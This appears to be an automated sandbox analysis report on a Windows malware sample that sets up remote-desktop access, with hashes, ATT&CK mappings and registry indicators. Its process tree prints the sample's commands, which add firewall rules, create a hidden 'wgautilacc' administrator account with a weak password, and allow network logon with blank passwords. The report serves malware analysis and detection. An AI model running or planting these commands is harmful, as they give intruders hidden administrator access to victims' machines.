Overview
overview
10Static
static
3a9f05c13d7...18.exe
windows7-x64
10a9f05c13d7...18.exe
windows10-2004-x64
10$PLUGINSDI...st.dll
windows7-x64
3$PLUGINSDI...st.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...ss.dll
windows7-x64
3$PLUGINSDI...ss.dll
windows10-2004-x64
3$PLUGINSDI...ry.dll
windows7-x64
3$PLUGINSDI...ry.dll
windows10-2004-x64
3$TEMP/RDP_5166.exe
windows7-x64
9$TEMP/RDP_5166.exe
windows10-2004-x64
9$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$TEMP/SETUP_73538.exe
windows7-x64
3$TEMP/SETUP_73538.exe
windows10-2004-x64
3$_1_/abashed.exe
windows7-x64
10$_1_/abashed.exe
windows10-2004-x64
10$_1_/libeay32.dll
windows7-x64
3$_1_/libeay32.dll
windows10-2004-x64
3$_1_/ssleay32.dll
windows7-x64
3$_1_/ssleay32.dll
windows10-2004-x64
3Analysis
-
max time kernel
125s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19-08-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
a9f05c13d758f4f34386042d85847bab_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/NSISList.dll
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/NSISList.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win7-20240705-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsProcess.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/registry.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/registry.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
$TEMP/RDP_5166.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
$TEMP/RDP_5166.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
$TEMP/SETUP_73538.exe
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
$TEMP/SETUP_73538.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
$_1_/abashed.exe
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
$_1_/abashed.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
$_1_/libeay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral24
Sample
$_1_/libeay32.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
$_1_/ssleay32.dll
Resource
win7-20240704-en
Behavioral task
behavioral26
Sample
$_1_/ssleay32.dll
Resource
win10v2004-20240802-en
General
-
Target
$TEMP/RDP_5166.exe
-
Size
569KB
-
MD5
a46ab91afbba2a657bce8e961bf2632f
-
SHA1
7c1a484a381fc4915c6904358f7a3611ad9323d2
-
SHA256
740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1
-
SHA512
a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4
-
SSDEEP
12288:8W7IR23s4x7/6GDG9e9WJX08vV0CjUsZl4VXqnxq:h7J5D6GDGc9WJk8d0wLIaq
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2056 cmd.exe 1112 net.exe 536 net1.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 2580 netsh.exe 2624 netsh.exe 596 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Icosahedron\\disavow.dll" SETUP_73538.exe -
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" RDP_5166.exe -
Executes dropped EXE 1 IoCs
pid Process 2772 SETUP_73538.exe -
Loads dropped DLL 7 IoCs
pid Process 2684 RDP_5166.exe 2684 RDP_5166.exe 2684 RDP_5166.exe 2684 RDP_5166.exe 2684 RDP_5166.exe 2684 RDP_5166.exe 2720 Process not Found -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList RDP_5166.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts RDP_5166.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" SETUP_73538.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\wgautilacc = "0" RDP_5166.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Icosahedron\disavow.ini SETUP_73538.exe File created C:\Program Files\Icosahedron\disavow.dll SETUP_73538.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SETUP_73538.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDP_5166.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Runs net.exe
-
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 2720 Process not Found 2720 Process not Found 2720 Process not Found 2720 Process not Found 2720 Process not Found -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2772 SETUP_73538.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2772 2684 RDP_5166.exe 30 PID 2684 wrote to memory of 2392 2684 RDP_5166.exe 32 PID 2684 wrote to memory of 2392 2684 RDP_5166.exe 32 PID 2684 wrote to memory of 2392 2684 RDP_5166.exe 32 PID 2684 wrote to memory of 2392 2684 RDP_5166.exe 32 PID 2392 wrote to memory of 2580 2392 cmd.exe 34 PID 2392 wrote to memory of 2580 2392 cmd.exe 34 PID 2392 wrote to memory of 2580 2392 cmd.exe 34 PID 2392 wrote to memory of 2580 2392 cmd.exe 34 PID 2684 wrote to memory of 2032 2684 RDP_5166.exe 36 PID 2684 wrote to memory of 2032 2684 RDP_5166.exe 36 PID 2684 wrote to memory of 2032 2684 RDP_5166.exe 36 PID 2684 wrote to memory of 2032 2684 RDP_5166.exe 36 PID 2032 wrote to memory of 2624 2032 cmd.exe 38 PID 2032 wrote to memory of 2624 2032 cmd.exe 38 PID 2032 wrote to memory of 2624 2032 cmd.exe 38 PID 2032 wrote to memory of 2624 2032 cmd.exe 38 PID 2684 wrote to memory of 2308 2684 RDP_5166.exe 39 PID 2684 wrote to memory of 2308 2684 RDP_5166.exe 39 PID 2684 wrote to memory of 2308 2684 RDP_5166.exe 39 PID 2684 wrote to memory of 2308 2684 RDP_5166.exe 39 PID 2308 wrote to memory of 1964 2308 cmd.exe 41 PID 2308 wrote to memory of 1964 2308 cmd.exe 41 PID 2308 wrote to memory of 1964 2308 cmd.exe 41 PID 2308 wrote to memory of 1964 2308 cmd.exe 41 PID 1964 wrote to memory of 864 1964 net.exe 42 PID 1964 wrote to memory of 864 1964 net.exe 42 PID 1964 wrote to memory of 864 1964 net.exe 42 PID 1964 wrote to memory of 864 1964 net.exe 42 PID 2684 wrote to memory of 2056 2684 RDP_5166.exe 43 PID 2684 wrote to memory of 2056 2684 RDP_5166.exe 43 PID 2684 wrote to memory of 2056 2684 RDP_5166.exe 43 PID 2684 wrote to memory of 2056 2684 RDP_5166.exe 43 PID 2056 wrote to memory of 2864 2056 cmd.exe 45 PID 2056 wrote to memory of 2864 2056 cmd.exe 45 PID 2056 wrote to memory of 2864 2056 cmd.exe 45 PID 2056 wrote to memory of 2864 2056 cmd.exe 45 PID 2864 wrote to memory of 2896 2864 net.exe 46 PID 2864 wrote to memory of 2896 2864 net.exe 46 PID 2864 wrote to memory of 2896 2864 net.exe 46 PID 2864 wrote to memory of 2896 2864 net.exe 46 PID 2056 wrote to memory of 1112 2056 cmd.exe 47 PID 2056 wrote to memory of 1112 2056 cmd.exe 47 PID 2056 wrote to memory of 1112 2056 cmd.exe 47 PID 2056 wrote to memory of 1112 2056 cmd.exe 47 PID 1112 wrote to memory of 536 1112 net.exe 48 PID 1112 wrote to memory of 536 1112 net.exe 48 PID 1112 wrote to memory of 536 1112 net.exe 48 PID 1112 wrote to memory of 536 1112 net.exe 48 PID 2772 wrote to memory of 596 2772 SETUP_73538.exe 49 PID 2772 wrote to memory of 596 2772 SETUP_73538.exe 49 PID 2772 wrote to memory of 596 2772 SETUP_73538.exe 49 PID 2772 wrote to memory of 596 2772 SETUP_73538.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\RDP_5166.exe"1⤵
- Allows Network login with blank passwords
- Loads dropped DLL
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe"C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe" -i2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:596
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\net.exenet user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never4⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "wgautilacc" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add4⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" "wgautilacc" /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:536
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Discovery
Permission Groups Discovery
1Local Groups
1System Information Discovery
1System Location Discovery
1System Language Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102KB
MD5de5ab87a7fcc1d9225feed2185fa0d08
SHA19184073717812324999601bf3dbfa89c52f2ce4d
SHA25654fa75eadbadd1c86ca950ae93b70e5512dea629d103fdf5eaa1b070a32068ac
SHA512226819782e68b051003f7f47b4e1d5a6b6d52713ee4bff6f740fbc356793d8e526663c7c51f230b44ac04449e4ca79c28a8454f20badf3f322d8f7a40c87851f
-
Filesize
1.5MB
MD59adce164113ec09d243a78029aecfa2e
SHA1403fb3148345800ca6f0374459e3f6d5ef3b613e
SHA256d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436
SHA512c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5
-
Filesize
11KB
MD50063d48afe5a0cdc02833145667b6641
SHA1e7eb614805d183ecb1127c62decb1a6be1b4f7a8
SHA256ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7
SHA51271cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0
-
Filesize
6KB
MD5293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19